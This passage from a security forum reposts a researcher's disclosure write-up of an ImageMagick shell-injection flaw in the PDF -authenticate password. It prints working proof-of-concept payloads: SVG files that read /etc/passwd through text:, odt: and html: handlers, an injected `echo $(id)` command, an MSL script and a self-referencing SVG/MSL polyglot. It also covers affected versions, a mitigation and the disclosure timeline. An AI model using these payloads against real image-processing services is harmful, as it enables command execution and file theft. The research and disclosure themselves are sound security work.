  23. ImageMagick - Shell injection via PDF password "Use ImageMagick® to create, edit, compose, or convert bitmap images. It can read and write images in a variety of formats (over 200) including PNG, JPEG, GIF, HEIC, TIFF, DPX, EXR, WebP, Postscript, PDF, and SVG [ and many more ]"1 In 2016 ImageTragick was revealed. The associated reseachers showed that ImageMagick is not only powerful, eg you can read local files, but that it is possible to execute shell commands via a maliciously crafted image. In late 2016 and in 2018 Tavis Ormandy (@taviso) showed how the support of external programs ( ghostscript) in ImageMagick could lead to remote execution. Given the past research I had a quick look at the supported external programs (libreoffice/openoffice I already spent quite some time on), and I decided to get a proper understanding how IM (ImageMagick) calls external programs and the way they fixed the shell injections in the ImageTragick report. As you are reading this blogpost, it paid off and I found a vulnerability. But I also learned two things: Note: 1) The IM team is really active and is trying to address any issue raised quickly (thats important later) 2) ImageMagick is an awesome tool to convert files. It supports some really weird old file types (often via external programs) and is trying to be as user friendly as possible, maybe a little too much ^^ The Fix: ImageMagick, https and cURL An important part of ImageMagick and how it handles files is not solely the infamous delegates.xml file but the coders folder. The delegates.xml file specifies the commands and parameters to call an external program to handle a certain file type. But before that the handlers in the aforementioned coders folders are used to parse a file and determine if an external program needs to be called (this is a simplification but in most cases it works this way) As there are lot of files in coders, I decided to check how https: URLs are handled by ImageMagick as I already knew curl will be used in the end, which was vulnerable to command injection. To keep it short - the https: handler is registered in this line: https://github.com/ImageMagick/ImageMagick/blob/master/coders/url.c#L327 In case IM has to handle https: URLs - the following branch is called: https://github.com/ImageMagick/ImageMagick/blob/master/coders/url.c#L157 status=InvokeDelegate(read_info,image,"https:decode",(char *) NULL, InvokeDelegate calls InterpretDelegateProperties, which calls GetMagickPropertyLetter, which calls SanitizeDelegateString. whitelist[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 " "$-_.+!;*(),{}|\\^~[]`\"><#%/?:@&="; [...] for (p+=strspn(p,whitelist); p != q; p+=strspn(p,whitelist)) *p='_'; return(sanitize_source); This function basically replaces ' (single quotes) with "_" on non-windows system (which I assume as the default). This is important as in the end ExternalDelegateCommand is called. This function handles calling external executables. The defined curl command in delegates.xml is used and the user defined URL is included in single quotes. As single quotes were filtered before, it is not possible to inject additional shell commands. I verified that by modifying the source code of IM and included some printf statements to dump the created command. So let's assume a SVG or MVG (an example is available in ImageTragick) that specifies an https: URL like this: <svg width="200" height="200" xmlns:xlink="http://www.w3.org/1999/xlink"> xmlns="http://www.w3.org/2000/svg"> <image xlink:href="https://example.com/test'injection" height="200" width="200"/> </svg> Command line: convert test.svg out.png The created shell command by ImageMagick looks like this: curl -s -k -L -o 'IMrandomnumber.dat' 'https://example.com/test_injection' Important Note: As shown by this example, different coders can call each other as in this case SVG triggers the execution of the url.c coder. In case ImageMagick is compiled to use a third-party library like librsvg to parse SVG files, the third party library handles protocols by itself. In this scenario it is still possible to trigger ImageMagicks own SVG parsers via the MSVG support ("ImageMagick's own SVG internal renderer"): convert test.msvg out.png ImageMagick also allows to set a specific handler via this syntax: convert msvg:test.svg out.png Short intermission - reading local files As ImageMagick allows to set specific file handlers as shown above, I decided to make a quick assessment, which handlers could allow to read and leak local files. My test case assumed that a user controlled SVG file is converted by IMs internal SVG parser to a PNG file, which is returned to the end user afterwards. An example could be an avatar upload on a website. convert test.svg userfile.png The first powerful coder is already mentioned in ImageTragick - text:. 'The "text:" input format is designed to convert plain text into images consisting one image per page of text. It is the 'paged text' input operator of ImageMagick.'. The coder is registered in txt.c. <svg width="1000" height="1000" xmlns:xlink="http://www.w3.org/1999/xlink"> xmlns="http://www.w3.org/2000/svg"> <image xlink:href="text:/etc/passwd" height="500" width="500"/> </svg> Another example to read /etc/passwd is based on LibreOffice. This is possible as LibreOffice supports the rendering of a text file. As ImageMagick has no support for this file type, the corresponding protocol handler can be found via the decode property in delegates.xml. This vector only works of course when OpenOffice/LibreOffice is installed: <svg width="1000" height="1000" xmlns:xlink="http://www.w3.org/1999/xlink"> xmlns="http://www.w3.org/2000/svg"> <image xlink:href="odt:/etc/passwd" height="500" width="500"/> </svg> It is also possible to use html: - in case html2ps is installed. Although ImageMagick registers a "HTML" handler, it only sets an encoder entry. Encoders only handle the creation/writing but not reading (this is done by the decoders) of the file type. Therefore the decoder in delegates.xml is used: <svg width="1000" height="1000" xmlns:xlink="http://www.w3.org/1999/xlink"> xmlns="http://www.w3.org/2000/svg"> <image xlink:href="html:/etc/passwd" height="500" width="500"/> </svg> This is not an exhausted list but should document the general idea. Back to the shell injection. Entry Point - Encrypted PDFs After I got an understanding of the usage of curl, I checked again the command defined in delegates.xml: <delegate decode="https:decode" command="&quot;@WWWDecodeDelegate@&quot; -s -k -L -o &quot;%u.dat&quot; &quot;https:%M&quot;"/> %M is replaced with the user-controlled URL. Therefore, I checked all occurrences of %M and if they are handled correctly. Additionally I had a look at all the defined replacement values defined in property.c. In the end nothing yielded a proper injection vulnerability. Then I stumbled upon the following line in the pdf.c coder: (void) FormatLocaleString(passphrase,MagickPathExtent, "\"-sPDFPassword=%s\" ",option); As this seemed to set a password, which is most likely fully user controlled, I looked up how this parameter can be set and if it could be abused. Based on the changelog, ImageMagick added a "-authenticate" command line parameter in 2017 to allow users to set a password for encrypted PDFs. So, I tested it via the following command to dump the created command: convert -authenticate "password" test.pdf out.png Shell command created: 'gs' -sstdout=%stderr -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 '-sDEVICE=pngalpha' -dTextAlphaBits=4 -dGraphicsAlphaBits=4 '-r72x72' "-sPDFPassword=password" '-sOutputFile=/tmp/magick-YPvcqDeC7K-Q8xn8VZPwHcp3G1WVkrj7%d' '-f/tmp/magick-sxCQc4-ip-mnuSAhGww-6IFnRQ46CBpD' '-f/tmp/magick-pU-nIhxrRulCPVrGEJ868knAmRL8Jfw9' As I confirmed that the password is included in the created gs command, which parses the specified PDF, it was time to check if double quotes are handled correctly: convert -authenticate 'test" FFFFFF' test.pdf out.png 'gs' -sstdout=%stderr -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 '-sDEVICE=pngalpha' -dTextAlphaBits=4 -dGraphicsAlphaBits=4 '-r72x72' "-sPDFPassword=test" FFFFFF" '-sOutputFile=/tmp/magick-YPvcqDeC7K-Q8xn8VZPwHcp3G1WVkrj7%d' '-f/tmp/magick-sxCQc4-ip-mnuSAhGww-6IFnRQ46CBpD' '-f/tmp/magick-pU-nIhxrRulCPVrGEJ868knAmRL8Jfw9 To my surprise I was able to prematurely close the -sPDFPassword parameter, which allows me to include additional shell commands. The specified "password" has to contain one of the following characters "&;<>|" so the shell injection gets actually triggered. The reason being that ImageMagick will only use the system call (and therefore the system shell) in case one of these characters is present: if ((asynchronous != MagickFalse) || (strpbrk(sanitize_command,"&;<>|") != (char *) NULL)) status=system(sanitize_command); Putting alltogether I tested the following command: convert -authenticate 'test" `echo $(id)> ./poc`;"' test.pdf out.png Shell command created: 'gs' -sstdout=%stderr -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 '-sDEVICE=pngalpha' -dTextAlphaBits=4 -dGraphicsAlphaBits=4 '-r72x72' "-sPDFPassword=test" `echo $(id)> ./poc`;"" '-sOutputFile=/tmp/magick-pyNxb2vdkh_8Avwvw0OlVhu2EfI3wSKl%d' '-f/tmp/magick-IxaYR7GhN3Sbz-299koufEXO-ccxx46u' '-f/tmp/magick-GXwZIbtEu63vyLALFcqHd2c0Jr24iitE' The file "poc" was created and it contained the output of the id command. At this point I had a confirmed shell injection vulnerability. The problem was: It is unlikely that a user has the possibility to set the authenticate parameter. So I decided to look for a better PoC: Explotation - MSL and Polyglots I needed to find a way to set the "-authenticate" parameter via a supported file type and I already knew where to look at: ImageMagick Scripting Language (MSL). This is a XML based file format supported by ImageMagick, which allows to set the input file, output file and additional parameters. An example file can be found here - I simplified it a bit: <?xml version="1.0" encoding="UTF-8"?> <image> <read filename="image.jpg" /> <get width="base-width" height="base-height" /> <resize geometry="400x400" /> <write filename="image.png" /> </image> This file format is not properly documented, which is mentioned by the ImageMagick team, so I checked the source code regarding the supported attributes. I quickly discovered the following line in the source code of the MSL coder: if (LocaleCompare(keyword,"authenticate") == 0) { (void) CloneString(&image_info->density,value); break; } Via additional debug calls I verified that this path handles any tag, which sets the authenticate attribute. But the code assigns the defined value to the density property, which made no sense. After studying the rest of the MSL code I came to the following conclusion: 1) This code should set the authenticate attribute similar to the "-authenticate" command line parameter. 2) The code was simply wrong and therefore blocking the possibility to abuse the shell injection. So I decided to do something I haven't done before: Mention this problem via Github and see if it gets fixed (I created a new github account for that) - https://github.com/ImageMagick/ImageMagick/discussions/2779 In the end the code was fixed correctly: if (LocaleCompare(keyword,"authenticate") == 0) { (void) SetImageOption(image_info,keyword,value); break; } I immediately created a PoC MSL script to verify I could abuse the shell injection. Note that it is necessary to specify the msl: protocol handler so IM actually parses the script file correctly: <?xml version="1.0" encoding="UTF-8"?> <image authenticate='test" `echo $(id)> ./poc`;"'> <read filename="test.pdf" /> <get width="base-width" height="base-height" /> <resize geometry="400x400" /> <write filename="out.png" /> </image> convert msl:test.msl whatever.png And it worked - the "poc" file was created, proofing the shell injection. Last step: Wrap this all up in one SVG polyglot file. SVG MSL polyglot file: My created polyglot file is a SVG file, which loads itself as an MSF file to trigger the shell injection vulnerability. I will start showing the SVG polyglot file and explain its structure: poc.svg: <image authenticate='ff" `echo $(id)> ./0wned`;"'> <read filename="pdf:/etc/passwd"/> <get width="base-width" height="base-height" /> <resize geometry="400x400" /> <write filename="test.png" /> <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <image xlink:href="msl:poc.svg" height="100" width="100"/> </svg> </image> First of all the SVG structure has an image root tag. As the parser does not enforce that the SVG tag is the root tag, IM has no problems parsing this file as a SVG. The SVG structure specifies an image URL, which uses msl:poc.svg. This tells ImageMagick to load poc.svg with the MSL coder. Although MSF is a XML based structure, the MSF coder does not deploy a real XML parser. It only requires that the file starts with a tag it supports. Another trick I used is present in the read tag. It is necessary to target a PDF file to trigger the vulnerability. To bypass this necessity, I specified any known local file and used the pdf: protocol handler to ensure it is treated as a PDF: PoC file in action: The PoC is still not perfect as I have to assume the filename does not get changed as the file has to be able to reference itself. But I decided thats good enough for now. PreConditions and protection Obviously this vulnerable only works in case ImageMagick is not compiled with a third-party library, which handles PDF parsing. Also a user has to be able to set the "authenticate" parameter, either via the command line or via MSL (as shown in my PoC file). In case ImageMagick must not handle PDF files, it is possible to disable the PDF coder via the policy.xml file therefore preventing the shell injection. How to configure policy.xml is already documented by https://imagetragick.com/ (just include "PDF"). Affected versions: - Injection via "-authenticate" -ImageMagick 7: 7.0.5-3 up 7.0.10-40 - Explotation via MSL: - ImageMagick 7: 7.0.10-35 up 7.0.10-40 Regarding ImageMagick 6 (aka legacy). Based on the source code the following versions should be vulnerable. - Injection via "-authenticate" - ImageMagick 6: 6.9.8-1 up to 6.9.11-40 - Explotation via MSL: -ImageMagick 6: 6.9.11-35 up to 6.9.11-40 I focused my testing solely on ImageMagick 7 so I tried ImageMagick 6 really late. It seems the "-authenticate" feature is broken in the legacy branch. But during testing my VM died so I leave it to the readers to create a PoC for ImageMagick 6 (or maybe I will do it as soon as I have some free time) Timeline: - 2020-11-01: Reported the vuln to ZDI - 2020-11-16: Didn't want to wait for any response from ZDI so reported the issue to ImageMagick - 2020-11-16: ImageMagick deployed a fix and asked me if I could wait for disclosure, as there is a release planned for this weekend. - 2020-11-16-20: Discussed the fix with the ImageMagick team. - 2020-11-21: Version 7.0.10-40 and 6.9.11-40 released. I want to thank the ImageMagick developers. They try to address and fix any issues raised as quick as possible (feature or security related, doesn't matter). Additionally they allowed me to provide input how I would address the issue (which is not always accepted^^). Eingestellt von Alex Inführ um 4:35 AM Sursa: https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
      • 1
      • Upvote
  24. In this video, Filedescriptor introduces his Chrome Extension "Untrusted Types" that abuses Trusted Types and demonstrates how easy it is to find DOMXSS using it. Untrusted Types GitHub repo: https://github.com/filedescriptor/unt... Google's Firing Range: https://public-firing-range.appspot.com/ Prompt(1) to win: https://prompt.ml
  25. This video explores the world of Server-Side Template Injections, primarily we'll look at Python with Flask framework as an example, but the core ideas explained in the video is applicable to wide set of Languages and Frameworks. 🐤 Twitter: https://twitter.com/PwnFunction 🎵 Track: Warriyo - Mortals (feat. Laura Brehm) NCS link: https://www.youtube.com/watch?v=yJg-Y...
×
×
  • Create New...